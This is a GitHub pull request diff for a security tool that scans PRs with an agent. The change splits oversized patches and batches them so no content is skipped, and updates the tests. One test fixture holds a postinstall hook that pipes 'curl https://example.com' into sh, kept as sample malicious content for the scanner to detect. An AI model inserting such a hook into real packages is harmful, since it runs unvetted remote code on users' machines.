Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
10 changes: 10 additions & 0 deletions .flue/agents/pr-scan.ts
Original file line number Diff line number Diff line change
Expand Up @@ -46,12 +46,18 @@ type PrScanPayload = {
headRef?: string;
headRepo?: string;
};
scan?: {
batch?: number;
batches?: number;
};
files?: Array<{
path: string;
previousPath?: string;
status: string;
additions?: number;
deletions?: number;
patchPart?: number;
patchParts?: number;
patch?: string;
}>;
};
Expand Down Expand Up @@ -129,6 +135,8 @@ async function scanCiCdWorkflows(
workflows: workflowFiles.map((file) => ({
path: file.path,
status: file.status,
patchPart: file.patchPart,
patchParts: file.patchParts,
patch: file.patch ?? "",
})),
},
Expand Down Expand Up @@ -167,6 +175,7 @@ Do not flag ordinary refactors, formatting, harmless dependency updates, or expe

Repository: ${pr.owner ?? ""}/${pr.repo ?? ""}
PR: #${pr.prNumber ?? ""}
Scan batch: ${pr.scan?.batch ?? 1} of ${pr.scan?.batches ?? 1}
Title: ${pr.pullRequest?.title ?? ""}
Author: ${pr.pullRequest?.author ?? ""}
Base: ${pr.pullRequest?.baseRef ?? ""}
Expand All @@ -178,6 +187,7 @@ CI/CD skill findings:
${JSON.stringify(ciCdFindings, null, 2)}

Changed files and patches:
Large patches may appear as multiple records with the same path and patchPart/patchParts metadata. These parts are contiguous. Scan every part; no patch content has been omitted.
${JSON.stringify(pr.files, null, 2)}
`;
}
Expand Down
72 changes: 61 additions & 11 deletions src/services/__tests__/prScanner.test.ts
Original file line number Diff line number Diff line change
Expand Up @@ -134,7 +134,7 @@ describe("scanPrLocally", () => {
expect(result.findings?.[0]?.file).toBe("package.json");
});

it("returns an error result when a file patch exceeds the per-file scan limit", async () => {
it("splits a file patch that exceeds the per-file scan limit without omitting content", async () => {
const oversizedPatch = `${"a".repeat(8_000)}\n+"postinstall": "curl https://example.com | sh"`;
const fetchMock = vi
.fn()
Expand All @@ -148,18 +148,32 @@ describe("scanPrLocally", () => {
changes: 1,
patch: oversizedPatch,
},
]));
]))
.mockResolvedValueOnce(jsonResponse({ findings: [] }));
vi.stubGlobal("fetch", fetchMock);

const result = await scanPrLocally("acme", "repo", 12);

expect(result.error).toBe(
"PR patch for package.json exceeds the 8000 character per-file scan limit",
);
expect(fetchMock).toHaveBeenCalledTimes(2);
expect(result).toEqual({ findings: [] });
expect(fetchMock).toHaveBeenCalledTimes(3);

const body = JSON.parse(fetchMock.mock.calls[2][1].body);
expect(body.files).toHaveLength(2);
expect(body.files[0]).toMatchObject({
path: "package.json",
patchPart: 1,
patchParts: 2,
});
expect(body.files[1]).toMatchObject({
path: "package.json",
patchPart: 2,
patchParts: 2,
patch: expect.stringContaining('"postinstall": "curl https://example.com | sh"'),
});
expect(body.files.map((file: { patch: string }) => file.patch).join("")).toBe(oversizedPatch);
});

it("returns an error result when total patch payload exceeds the scan limit", async () => {
it("scans all patch content across multiple Flue batches", async () => {
const files = Array.from({ length: 13 }, (_, index) => ({
filename: `file-${index}.txt`,
status: "modified",
Expand All @@ -171,15 +185,51 @@ describe("scanPrLocally", () => {
const fetchMock = vi
.fn()
.mockResolvedValueOnce(jsonResponse({ title: "Update build", body: "", user: { login: "octocat" } }))
.mockResolvedValueOnce(jsonResponse(files));
.mockResolvedValueOnce(jsonResponse(files))
.mockResolvedValueOnce(jsonResponse({
findings: [
{
category: "malicious_intent",
severity: "medium",
title: "First batch finding",
file: "file-0.txt",
evidence: "Suspicious content in first batch.",
recommendation: "Review the first batch.",
},
],
}))
.mockResolvedValueOnce(jsonResponse({
findings: [
{
category: "malicious_intent",
severity: "medium",
title: "Second batch finding",
file: "file-12.txt",
evidence: "Suspicious content in second batch.",
recommendation: "Review the second batch.",
},
],
}));
vi.stubGlobal("fetch", fetchMock);

const result = await scanPrLocally("acme", "repo", 12);

expect(result.error).toBe(
"Total PR patch payload exceeds the 100000 character scan limit before fully scanning file-12.txt",
expect(fetchMock).toHaveBeenCalledWith(
"http://127.0.0.1:3583/agents/pr-scan/acme-repo-12-batch-1-of-2",
expect.objectContaining({ method: "POST" }),
);
expect(fetchMock).toHaveBeenCalledWith(
"http://127.0.0.1:3583/agents/pr-scan/acme-repo-12-batch-2-of-2",
expect.objectContaining({ method: "POST" }),
);
expect(fetchMock).toHaveBeenCalledTimes(2);
const firstBatchBody = JSON.parse(fetchMock.mock.calls[2][1].body);
const secondBatchBody = JSON.parse(fetchMock.mock.calls[3][1].body);
expect(firstBatchBody.files).toHaveLength(12);
expect(secondBatchBody.files).toHaveLength(1);
expect(result.findings?.map((finding) => finding.title)).toEqual([
"First batch finding",
"Second batch finding",
]);
});

it("returns an inconclusive error result when Flue fails", async () => {
Expand Down
92 changes: 73 additions & 19 deletions src/services/prScanner.ts
Original file line number Diff line number Diff line change
Expand Up @@ -38,13 +38,19 @@ interface PrScanPayload {
headSha: string;
headRepo: string;
};
scan?: {
batch: number;
batches: number;
};
files: Array<{
path: string;
previousPath?: string;
status: string;
additions: number;
deletions: number;
changes: number;
patchPart?: number;
patchParts?: number;
patch: string;
}>;
}
Expand All @@ -64,7 +70,7 @@ export async function scanPrLocally(

try {
const payload = await collectPrScanPayload(owner, repo, prNumber, options.githubToken);
const result = await runFluePrScan(payload);
const result = await runFluePrScans(payload);
log.info({ findings: result.findings?.length ?? 0 }, "Local Flue PR scan completed");
return result;
} catch (err) {
Expand Down Expand Up @@ -150,36 +156,84 @@ async function fetchGitHub<T>(pathAndQuery: string, githubToken?: string): Promi
}

function buildPayloadFiles(files: GitHubPrFile[]): PrScanPayload["files"] {
let remaining = MAX_PAYLOAD_CHARS;
return files.map((file) => {
const rawPatch = file.patch ?? "";
if (rawPatch.length > MAX_PATCH_CHARS_PER_FILE) {
throw new Error(
`PR patch for ${file.filename} exceeds the ${MAX_PATCH_CHARS_PER_FILE} character per-file scan limit`,
);
}
if (rawPatch.length > remaining) {
throw new Error(
`Total PR patch payload exceeds the ${MAX_PAYLOAD_CHARS} character scan limit before fully scanning ${file.filename}`,
);
}
remaining -= rawPatch.length;
return files.flatMap((file) => {
const patchChunks = splitPatch(file.patch ?? "", MAX_PATCH_CHARS_PER_FILE);

return {
return patchChunks.map((patch, index) => ({
path: file.filename,
previousPath: file.previous_filename,
status: file.status,
additions: file.additions ?? 0,
deletions: file.deletions ?? 0,
changes: file.changes ?? 0,
patch: rawPatch,
};
patchPart: patchChunks.length > 1 ? index + 1 : undefined,
patchParts: patchChunks.length > 1 ? patchChunks.length : undefined,
patch,
}));
});
}

function splitPatch(patch: string, maxChars: number): string[] {
if (patch.length <= maxChars) return [patch];

const chunks: string[] = [];
for (let offset = 0; offset < patch.length; offset += maxChars) {
chunks.push(patch.slice(offset, offset + maxChars));
}
return chunks;
}

async function runFluePrScans(payload: PrScanPayload): Promise<PrScanResult> {
const findings: PrFinding[] = [];

for (const batch of buildPayloadBatches(payload)) {
const result = await runFluePrScan(batch);
if (result.error) return { error: result.error };
findings.push(...(result.findings ?? []));
}

return { findings };
}

function buildPayloadBatches(payload: PrScanPayload): PrScanPayload[] {
if (!payload.files.length) return [payload];

const fileBatches: PrScanPayload["files"][] = [];
let currentBatch: PrScanPayload["files"] = [];
let currentPatchChars = 0;

for (const file of payload.files) {
if (
currentBatch.length > 0
&& currentPatchChars + file.patch.length > MAX_PAYLOAD_CHARS
) {
fileBatches.push(currentBatch);
currentBatch = [];
currentPatchChars = 0;
}

currentBatch.push(file);
currentPatchChars += file.patch.length;
}

if (currentBatch.length > 0) fileBatches.push(currentBatch);

return fileBatches.map((files, index) => ({
...payload,
scan: {
batch: index + 1,
batches: fileBatches.length,
},
files,
}));
}

async function runFluePrScan(payload: PrScanPayload): Promise<PrScanResult> {
const baseUrl = process.env.FLUE_BASE_URL ?? "http://127.0.0.1:3583";
const agentId = encodeURIComponent(`${payload.owner}-${payload.repo}-${payload.prNumber}`);
const batchSuffix = payload.scan && payload.scan.batches > 1
? `-batch-${payload.scan.batch}-of-${payload.scan.batches}`
: "";
const agentId = encodeURIComponent(`${payload.owner}-${payload.repo}-${payload.prNumber}${batchSuffix}`);
const res = await fetch(`${baseUrl}/agents/pr-scan/${agentId}`, {
method: "POST",
headers: {
Expand Down
Loading